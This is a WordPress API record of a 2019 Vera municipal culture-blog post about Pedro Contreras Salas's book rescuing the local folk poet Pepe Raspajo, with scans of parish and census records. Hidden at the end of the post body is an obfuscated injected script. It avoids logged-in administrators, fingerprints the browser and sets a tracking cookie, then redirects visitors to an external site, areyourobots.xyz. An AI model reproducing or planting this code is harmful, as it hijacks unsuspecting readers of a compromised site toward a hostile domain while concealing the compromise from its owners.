{"id":4152,"date":"2019-11-14T10:16:11","date_gmt":"2019-11-14T10:16:11","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=4152"},"modified":"2019-11-14T10:56:46","modified_gmt":"2019-11-14T10:56:46","slug":"pedro-contreras-salas-rescata-la-figura-del-trovero-veratense-pepe-raspajo-jose-garcia-haro","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2019\/11\/14\/pedro-contreras-salas-rescata-la-figura-del-trovero-veratense-pepe-raspajo-jose-garcia-haro\/","title":{"rendered":"PEDRO CONTRERAS SALAS RESCATA LA FIGURA DEL TROVERO VERATENSE PEPE RASPAJO. JOS\u00c9 GARC\u00cdA HARO"},"content":{"rendered":"<p>Pedro Contreras Salas rescata la figura del trovero veratense Pepe Raspajo.<\/p>\n<p><!--more--><\/p>\n<p>(DIARIO DE ALMER\u00cdA. V\u00edctor Visiedo) 24-10-2019<\/p>\n<p class=\"mce\">Tras muchos a\u00f1os de trabajo, el <strong class=\"mce\">escritor Pedro Contreras Salas<\/strong> ha podido hacer realidad su deseo de recuperar del olvido la figura del trovero veratense Pepe Raspajo. No ha sido una labor sencilla, pues los casi ochenta a\u00f1os transcurridos desde la muerte del poeta y la falta de informaci\u00f3n sobre \u00e9l, han supuesto una enorme dificultad para llevar a cabo la investigaci\u00f3n.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/Contreras-alcalde-Vera-concejales-presentacion_1403270533_111636995_667x375.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-4153\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/Contreras-alcalde-Vera-concejales-presentacion_1403270533_111636995_667x375-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/Contreras-alcalde-Vera-concejales-presentacion_1403270533_111636995_667x375-300x169.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/Contreras-alcalde-Vera-concejales-presentacion_1403270533_111636995_667x375.jpg 667w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"mce\">La pasada semana, Pedro Contreras present\u00f3 el libro<strong class=\"mce\"> \u2018El trovero veratense Pepe Raspajo\u2019<\/strong> en una abarrotada sala del restaurante Terraza Carmona. Estuvo acompa\u00f1ado de decenas de veratenses, adem\u00e1s del alcalde, Jos\u00e9 Carmelo Jorge, la edil de Cultura, Manuela Caparr\u00f3s, el periodista Pedro Fern\u00e1ndez C\u00e9spedes y la nieta del trovero, Mar\u00eda Teresa Garc\u00eda.<\/p>\n<p>\u201cEste libro desvela la existencia del<strong class=\"mce\"> trovero Jos\u00e9 Garc\u00eda de Haro, nacido en 1865 y fallecido en 1941<\/strong>, labrador, minero y emigrante, nacido en los campos de la Jara, sin m\u00e1s escuela que las letras que les ense\u00f1aron sus padres a la luz de un candil\u201d, explica el autor. Es un peque\u00f1o homenaje a una persona que \u201ces patrimonio de la cultura veratense y cuya puesta en valor no pod\u00eda demorarse m\u00e1s en el tiempo\u201d, cuenta.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pepe-raspajo.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-4155\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pepe-raspajo-202x300.jpg\" alt=\"\" width=\"202\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pepe-raspajo-202x300.jpg 202w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pepe-raspajo.jpg 476w\" sizes=\"(max-width: 202px) 100vw, 202px\" \/><\/a><\/p>\n<p class=\"mce\">Contreras, de origen humilde como Pepe Raspajo, es buen conocedor de la obra del trovero. \u201cSus trovos siempre fueron alusivos a cada momento y situaci\u00f3n de su vida:<strong class=\"mce\"> cantos de labranza, sobre la mina, de momentos alegres o de tristezas, como la muerte de alg\u00fan amigo\u201d.<\/strong> Su trovo se convirti\u00f3 en poes\u00eda popular, y se repet\u00edan a la luz de la lumbre o al fresco en los cortijos de Vera durante muchos a\u00f1os.<\/p>\n<p class=\"mce\">Durante 12 a\u00f1os, Pedro Contreras Salas ha indagado en la figura de este veratense ya casi olvidado. A trav\u00e9s de su sobrina-nieta, Catalina Garc\u00eda, obtuvo sus versos, escritas en cuartillas de papel amarillentas por el paso de los a\u00f1os. Gracias a la familia del trovero y de algunas personas que lo conocieron en vida, Contreras ha podido dibujar un perfil de su persona y obra, para que no se pierda en el tiempo. \u201cEste libro habr\u00eda brillado con m\u00e1s esplendor en manos de expertos y no en las de un campesino inculto y sin preparaci\u00f3n alguna como yo. Pero no deb\u00edamos demorar m\u00e1s el conocimiento de este personaje tan importante para la cultura veratense, que es patrimonio de todos\u201d, confiesa.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-4156\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo-300x121.jpg\" alt=\"\" width=\"300\" height=\"121\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo-300x121.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo-768x309.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo-1024x412.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/desenga\u00f1os-de-pepe-raspajo.jpg 1132w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pedro-contreras.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4157\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pedro-contreras-235x300.jpg\" alt=\"\" width=\"235\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pedro-contreras-235x300.jpg 235w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/pedro-contreras.jpg 451w\" sizes=\"(max-width: 235px) 100vw, 235px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/soneto-jos\u00e9-garc\u00eda-haro.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4158\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/soneto-jos\u00e9-garc\u00eda-haro-300x254.jpg\" alt=\"\" width=\"300\" height=\"254\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/soneto-jos\u00e9-garc\u00eda-haro-300x254.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/soneto-jos\u00e9-garc\u00eda-haro.jpg 711w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"mce\">Pedro Contreras Salas, nacido en Vera hace 75 a\u00f1os, <strong class=\"mce\">ha sido carnicero durante la mayor parte de su vida.<\/strong> Sin embargo, siempre ha tenido inquietudes culturales, lo que le llev\u00f3 a publicar \u2018Cuentos y Leyendas de Vera\u2019 o \u2018El se\u00f1orito y otras historias de Vera\u2019, adem\u00e1s de otras colaboraciones.<\/p>\n<p class=\"mce\">Su nuevo libro, editado por Circulo Rojo, tiene un precio de 10 euros y se puede comprar directamente al autor o en la web de la editorial.<\/p>\n<p>Documentos del Archivo Municipal y de la Parroquia de Vera relacionados con Pepe Raspajo:<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4168\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera-212x300.jpg\" alt=\"\" width=\"212\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera-212x300.jpg 212w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera-768x1087.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera-723x1024.jpg 723w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1911-vera.jpg 1102w\" sizes=\"(max-width: 212px) 100vw, 212px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4167\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera-211x300.jpg\" alt=\"\" width=\"211\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera-211x300.jpg 211w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera-768x1093.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera-720x1024.jpg 720w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/padr\u00f3n-1906-vera.jpg 1102w\" sizes=\"(max-width: 211px) 100vw, 211px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4166\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios-269x300.jpg\" alt=\"\" width=\"269\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios-269x300.jpg 269w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios-768x857.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios-918x1024.jpg 918w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/matrimonio-con-luis-gerez-cazorla-luisa-garc\u00eda-de-haro-libro-30-matrimonios.jpg 1670w\" sizes=\"(max-width: 269px) 100vw, 269px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4165\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907-244x300.jpg\" alt=\"\" width=\"244\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907-244x300.jpg 244w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907-768x944.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907-833x1024.jpg 833w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/MANUELA-GARC\u00cdA-DE-HARO-15-01-1907.jpg 1417w\" sizes=\"(max-width: 244px) 100vw, 244px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/jos\u00e9-mar\u00eda-garc\u00eda-haro-25-01-1909-bautizos-lib-num-80.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4164\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/jos\u00e9-mar\u00eda-garc\u00eda-haro-25-01-1909-bautizos-lib-num-80-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/jos\u00e9-mar\u00eda-garc\u00eda-haro-25-01-1909-bautizos-lib-num-80-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/jos\u00e9-mar\u00eda-garc\u00eda-haro-25-01-1909-bautizos-lib-num-80-768x1024.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/jos\u00e9-mar\u00eda-garc\u00eda-haro-25-01-1909-bautizos-lib-num-80.jpg 1596w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4163\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904-768x1023.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904-769x1024.jpg 769w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/JOS\u00c9-GARC\u00cdA-DE-HARO-28-02-1904.jpg 1229w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4162\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42-300x222.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42-768x568.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42-1024x757.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/24-05-1841-sepelio-pepe-raspajo-fallecimiento-23-05-1841-libro-42.jpg 1179w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-4161\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL-232x300.jpg\" alt=\"\" width=\"232\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL-232x300.jpg 232w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL-768x993.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL-792x1024.jpg 792w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2019\/11\/19-05-1920-MATRIMONIO-RASPAJO-JUANA-RUBIO-N\u00da\u00d1EZ-LIBRO-30-PARROQUIAL.jpg 1417w\" sizes=\"(max-width: 232px) 100vw, 232px\" \/><\/a><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pedro Contreras Salas rescata la figura del trovero veratense Pepe Raspajo.<\/p>\n","protected":false},"author":7,"featured_media":4154,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,312,183,109],"tags":[318,317,35,319],"class_list":["post-4152","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-creacion-literaria","category-etnologia","category-historia","tag-pedro-contreras-salas","tag-pepe-raspajo","tag-poesia","tag-victor-visiedo"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/4152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=4152"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/4152\/revisions"}],"predecessor-version":[{"id":4171,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/4152\/revisions\/4171"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/4154"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=4152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=4152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=4152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}